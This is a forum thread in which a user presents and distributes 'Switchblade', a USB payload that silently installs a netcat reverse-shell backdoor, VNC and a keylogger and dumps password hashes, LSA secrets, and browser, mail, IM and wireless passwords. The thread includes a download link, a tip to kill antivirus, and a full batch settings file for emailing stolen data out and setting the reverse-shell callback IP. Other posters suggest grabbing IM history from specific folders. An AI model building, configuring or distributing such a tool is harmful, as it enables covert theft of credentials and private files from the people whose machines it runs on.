Xqtftqx Switchblade (In Progress)


Posted

Alright, I've noticed that none of the payloads fit my style, so I decided to make one.

Its features so far are:

-Installs Backdoor (thanks to stablefoxx)

-Installs VNC

-Gets IP address

-Gets open ports

-Gets History

-Gets Mail Passwords

-Gets Network Passwords

-Gets Passwords

-Gets Product Keys

-Gets running Apps

-Gets Services

-Gets Updates

-Gets User Account Info

-Gets Wireless Passwords

-Plants Keylogger

-Gets TXT's

So far that's it; none are found by my AV.

If you have any questions, please ask me.

If you have any suggestions, please ask me.

Download:

http://rapidshare.com/files/73533260/Xqtftqx.zip.html

------------------------------------------------------------------------

Upcoming Features:

Pwdump

lsa secrets

cache

plants a little app to allow you to log their clipboard

and more!

Posted

Just taskkill avg!  :-P quick and dirty fix

  • 1 month later...
Posted

K, thanks.

The hardest part about releasing this is gonna be documentation. It does so much, and it's so complex. I tried making it as noob friendly as I can, but they'll still need a shit load of instructions and what everything does and editing the settings file.

Posted

Thanks, I'm almost finished with documentation.

I'm gonna post it up as soon as I finish the bugs.

I really need some help coding this. If anybody can help, please PM me.

Current features of current version (not released version):

-Files in 7z archive

-Install Keylogger

-Install VNC

-Install Hacksaw

-Install Netcat Backdoor (Reverse)

-Dumps Running Services

-Dumps Password Hashes

-Dumps IP address

-Dumps Firefox Passwords

-Dumps Clipboard

-Dump Internet Explorer Passwords

-Dump Mozilla History

-Dumps USB logs

-Dumps Open Ports

-Dumps Mail Passwords

-Dumps Running Apps

-Dump Network Passwords

-Dumps IM Passwords

-Port Scan

-Dumps LSA secrets

-Dumps Wireless Keys

-Dumps Windows Updates

-Dumps Internet Explorer History

-Dumps Cache

-Podslurp Files

As you can see, it does a lot. There are also some optional features. They follow:

-Check for Safety.txt

-Run minimized

There's also an easy configuration file.

Here, I'll post it. Tell me if you think it's noob friendly.

:::XQTFTQX PAYLOAD SETTINGS FILE:::

:::::::::::::General Options:::::::::::::

::Configure Email Options
set emailfrom=
set emailto=
set password=

::Configure IP Address
set ip=0000000

:::::::::::::Payload Optional Features:::::::::::::

::Check for Safety.txt
set safety=1

::Run Payload Silently
set hide=0

:::::::::::::File Slurping Options:::::::::::::

::Enable Slurp
set slurp=1

::Locations for Slurp (And All Subdirectories)
set slurplocation1=C:\Documents and Settings\%username%\My Documents
set slurplocation2=C:\Documents and Settings\%username%\Desktop
set slurplocation3=

::Document Types To Slurp
set slurptype1=doc
set slurptype2=xml
set slurptype3=mp3
set slurptype4=bmp
set slurptype5=txt

:::::::::::::Payload Modules:::::::::::::

::Install Keylogger
set keylog=0

::Install Hacksaw
set hacksaw=0

::Install VNC
set vnc=0

::Install Backdoor
set nc=0

::Grab Keylogger log
set grabkeylog=0

::Grab Running Services
set services=0

::Dump Password Hashes
set hashes=0

::Dump IP Address
set dumpip=0

::Dump Firefox Passwords
set firefoxpw=0

::Dump Clipboard
set clipboard=0

::Dump Internet Explorer passwords
set ippw=0

::Dump Firefox History
set firefoxh=0

::Dump USB logs
set usb=0

::Dump Open ports
set ports=0

::Dump Mail Passwords
set mail=0

::Dump running Apps
set apps=0

::Dump Network passwords
set netpass=0

::Dump IM passwords
set im=0

::Port scan
set scanports=0

::Dump LSA secrets
set lsa=0

::Dump wireless passwords
set wireless=0

::Dump Windows Updates
set updates=0

::Dump Internet explorer history
set ieh=0

::Dump Cache
set cache=0

Basically, when you run it, it edits the batch files to the email and IP.

Email used for hacksaw and keylogger (emails every 5 hours).

IP used for backdoor. Very simple to use: run a batch file, and modify the IP to yours and it connects to a reverse shell.

And for all the log files, changing the 0 to a 1 enables them. So, what do you think?
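For a defender who recovers a settings file like this from a removable drive, the layout in the post (`set name=value` lines, `::` comments, 1 meaning enabled) can be triaged mechanically. The following is an added example, not part of the original post or the payload; the category grouping, the function names and the sample values are assumptions constructed for illustration.

```python
import re

# Analyst-facing grouping of the setting names from the post. The grouping is
# this example's assumption, not something the payload defines.
CATEGORIES = {
    "remote access": {"keylog", "hacksaw", "vnc", "nc"},
    "credential access": {"hashes", "firefoxpw", "ippw", "mail", "netpass",
                          "im", "lsa", "wireless", "cache"},
    "discovery": {"services", "dumpip", "usb", "ports", "apps",
                  "scanports", "updates"},
    "collection": {"grabkeylog", "clipboard", "firefoxh", "ieh", "slurp"},
}
SET_LINE = re.compile(r"^\s*set\s+(\w+)=(.*)$", re.IGNORECASE)

def parse_settings(text):
    """Map name -> value for each `set name=value` line; `::` lines are comments."""
    settings = {}
    for line in text.splitlines():
        match = None if line.lstrip().startswith("::") else SET_LINE.match(line)
        if match:
            settings[match.group(1).lower()] = match.group(2).strip()
    return settings

def triage(text):
    """Summarise what a recovered settings file was configured to do."""
    s = parse_settings(text)
    def numbered(prefix):  # slurplocation1..N / slurptype1..N, empty slots dropped
        return [v for k, v in sorted(s.items()) if k.startswith(prefix) and v]
    enabled = {cat: sorted(k for k in keys if s.get(k) == "1")
               for cat, keys in CATEGORIES.items()}
    return {
        "enabled": {cat: ks for cat, ks in enabled.items() if ks},
        "mailboxes": [s[k] for k in ("emailfrom", "emailto") if s.get(k)],
        "mail_password_set": bool(s.get("password")),  # never echo the secret
        "callback_ip": s.get("ip") or None,
        "slurp_paths": numbered("slurplocation"),
        "slurp_types": numbered("slurptype"),
    }

# Constructed sample (documentation-range address and domain), not a real capture.
SAMPLE = r"""::Configure Email Options
set emailto=drop@example.test
set password=placeholder
set ip=192.0.2.10
set slurp=1
set slurplocation1=C:\Documents and Settings\%username%\Desktop
set nc=1
set hashes=0
set lsa=1"""
if __name__ == "__main__": print(triage(SAMPLE))
```

The mailbox and callback address fields are the ones worth pivoting on in mail and firewall logs; the password is reported only as present or absent so the triage output can be shared safely.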

Posted

Wow, looks very good!! Like it, and can add to copy received files from IM and history log, but right now is very great payload.

About the coding, well, I don't know a lot but I can try :)

Supervisor.

Posted

Will this have the ability to turn off or on certain features? The one I'm using now has a SBConfig.exe file that you can customize your attack. Or is this one all or none kinda thing?

Posted

If you don't want to install the keylogger then just set 0 in the option in the code above and this will be disabled; it's like SBconfig.exe of Gonzor payload, just no GUI.

Supervisor

Posted

And the location ;)

As for IM history, probably not, because IM history logging has to be enabled. I could do something where it enables, then grabs. Not sure if it's a reg key or not.

Posted

I don't mean Miranda that needs the *.dat file. I mean ICQ/MSN history.

MSN history is in "C:\Documents and Settings\%username%\My Documents\My Received Files", and there are all the files that were received and the history in a subfolder.

About the ICQ history, the folder is in a hidden folder "C:\Documents & Settings\%username%\Application Data\ICQ".

So I think that copy option can go to the slurp.

And again, if you need some help, I will do my best to help you.

Supervisor

  • 4 weeks later...
Posted

Beta release coming! It's not going to be public; drop me an email with subject "USB" and you'll be on the list! Only 19 spots left, so hurry up! Email: xqtftqxt@gmail.com

It will be released when 20 people sign up.

EDIT: I've changed my email, all messages backed up.

Posted

Email sent.

Can you add a list of the things the switchblade does?

New things, bugs - all the things that make this one a beta release.

It can be useful :)

Supervisor
